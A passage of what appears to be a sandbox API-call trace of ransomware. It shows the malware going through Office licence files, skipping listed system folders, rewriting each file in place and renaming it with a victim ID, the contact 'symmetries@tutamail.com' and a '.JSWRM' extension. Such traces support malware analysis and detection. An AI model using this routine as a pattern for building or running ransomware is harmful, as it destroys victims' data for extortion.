lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0103.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0103.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Retail3-ul-phn.xrm-ms", cchWideChar=35, lpMultiByteStr=0x22cdc8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_Retail3-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 35 [0103.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0103.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bfb8 [0103.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Retail3-ul-phn.xrm-ms", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0103.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0103.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Retail3-ul-phn.xrm-ms", cchWideChar=35, lpMultiByteStr=0x22d0a0, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_Retail3-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 35 [0103.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bfb8 | out: hHeap=0x1e0000) returned 1 [0103.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0103.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0103.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0103.621] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail3-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail3-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.621] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19958) returned 1 [0103.621] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.622] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4df0) returned 0x24c1d0 [0103.622] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4df0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4df0, lpOverlapped=0x0) returned 1 [0103.624] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.625] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4df0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4df0, lpOverlapped=0x0) returned 1 [0103.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.625] CloseHandle (hObject=0x45c) returned 1 [0103.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0103.625] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0103.625] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0103.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0103.625] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0103.625] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0103.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0103.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f720 [0103.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0103.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0103.625] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail3-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail3-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail3-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail3-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0103.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0103.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0103.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0103.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0103.626] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe451402c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe451402c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe485b385, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2b9f, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeBusinessR_Trial-pl.xrm-ms", cAlternateFileName="HODAC9~1.XRM")) returned 1 [0103.627] lstrcmpiW (lpString1="HomeBusinessR_Trial-pl.xrm-ms", lpString2=".") returned 1 [0103.627] lstrcmpiW (lpString1="HomeBusinessR_Trial-pl.xrm-ms", lpString2="..") returned 1 [0103.627] lstrcmpiW (lpString1="HomeBusinessR_Trial-pl.xrm-ms", lpString2="...") returned 1 [0103.627] lstrcmpiW (lpString1="HomeBusinessR_Trial-pl.xrm-ms", lpString2="windows") returned -1 [0103.627] lstrcmpiW (lpString1="HomeBusinessR_Trial-pl.xrm-ms", lpString2="recovery") returned -1 [0103.627] lstrcmpiW (lpString1="HomeBusinessR_Trial-pl.xrm-ms", lpString2="perflogs") returned -1 [0103.627] lstrcmpiW (lpString1="HomeBusinessR_Trial-pl.xrm-ms", lpString2="documents and settings") returned 1 [0103.627] lstrcmpiW (lpString1="HomeBusinessR_Trial-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.627] lstrcmpiW (lpString1="HomeBusinessR_Trial-pl.xrm-ms", lpString2="system volume information") returned -1 [0103.627] lstrcmpiW (lpString1="HomeBusinessR_Trial-pl.xrm-ms", lpString2="msocache") returned -1 [0103.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0103.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Trial-pl.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0103.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0103.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Trial-pl.xrm-ms", cchWideChar=29, lpMultiByteStr=0x241218, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_Trial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0103.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0103.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0103.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Trial-pl.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0103.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0103.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Trial-pl.xrm-ms", cchWideChar=29, lpMultiByteStr=0x240fc0, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_Trial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0103.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0103.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0103.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0103.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0103.627] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Trial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_trial-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.628] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11167) returned 1 [0103.628] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2b90) returned 0x24c1d0 [0103.628] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2b90, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2b90, lpOverlapped=0x0) returned 1 [0103.630] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.630] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2b90, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2b90, lpOverlapped=0x0) returned 1 [0103.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.630] CloseHandle (hObject=0x45c) returned 1 [0103.630] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0103.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.630] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0103.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.630] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0103.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0103.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0103.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0103.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0103.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e9d0 [0103.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0103.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0103.631] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Trial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_trial-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Trial-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_trial-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e9d0 | out: hHeap=0x1e0000) returned 1 [0103.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0103.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0103.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0103.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0103.632] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe415a524, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe415a524, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe42d7c8c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x56c6, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeBusinessR_Trial-ppd.xrm-ms", cAlternateFileName="HO3298~1.XRM")) returned 1 [0103.632] lstrcmpiW (lpString1="HomeBusinessR_Trial-ppd.xrm-ms", lpString2=".") returned 1 [0103.632] lstrcmpiW (lpString1="HomeBusinessR_Trial-ppd.xrm-ms", lpString2="..") returned 1 [0103.632] lstrcmpiW (lpString1="HomeBusinessR_Trial-ppd.xrm-ms", lpString2="...") returned 1 [0103.632] lstrcmpiW (lpString1="HomeBusinessR_Trial-ppd.xrm-ms", lpString2="windows") returned -1 [0103.632] lstrcmpiW (lpString1="HomeBusinessR_Trial-ppd.xrm-ms", lpString2="recovery") returned -1 [0103.632] lstrcmpiW (lpString1="HomeBusinessR_Trial-ppd.xrm-ms", lpString2="perflogs") returned -1 [0103.632] lstrcmpiW (lpString1="HomeBusinessR_Trial-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0103.632] lstrcmpiW (lpString1="HomeBusinessR_Trial-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.632] lstrcmpiW (lpString1="HomeBusinessR_Trial-ppd.xrm-ms", lpString2="system volume information") returned -1 [0103.632] lstrcmpiW (lpString1="HomeBusinessR_Trial-ppd.xrm-ms", lpString2="msocache") returned -1 [0103.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0103.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Trial-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0103.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0103.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Trial-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x241290, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_Trial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0103.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0103.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d770 [0103.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Trial-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0103.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0103.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Trial-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x2412b8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_Trial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0103.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d770 | out: hHeap=0x1e0000) returned 1 [0103.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0103.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0103.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.633] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0103.633] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Trial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_trial-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.633] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=22214) returned 1 [0103.633] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.633] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x56c0) returned 0x24c1d0 [0103.633] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x56c0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x56c0, lpOverlapped=0x0) returned 1 [0103.636] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.636] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x56c0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x56c0, lpOverlapped=0x0) returned 1 [0103.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.636] CloseHandle (hObject=0x45c) returned 1 [0103.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0103.636] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0103.636] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0103.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0103.636] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0103.637] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0103.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0103.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0103.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0103.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0103.637] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Trial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_trial-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Trial-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_trial-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0103.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0103.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0103.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0103.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0103.638] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe423f37b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe423f37b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe42fdf13, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d65, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeBusinessR_Trial-ul-oob.xrm-ms", cAlternateFileName="HO6B26~1.XRM")) returned 1 [0103.638] lstrcmpiW (lpString1="HomeBusinessR_Trial-ul-oob.xrm-ms", lpString2=".") returned 1 [0103.638] lstrcmpiW (lpString1="HomeBusinessR_Trial-ul-oob.xrm-ms", lpString2="..") returned 1 [0103.638] lstrcmpiW (lpString1="HomeBusinessR_Trial-ul-oob.xrm-ms", lpString2="...") returned 1 [0103.638] lstrcmpiW (lpString1="HomeBusinessR_Trial-ul-oob.xrm-ms", lpString2="windows") returned -1 [0103.638] lstrcmpiW (lpString1="HomeBusinessR_Trial-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0103.638] 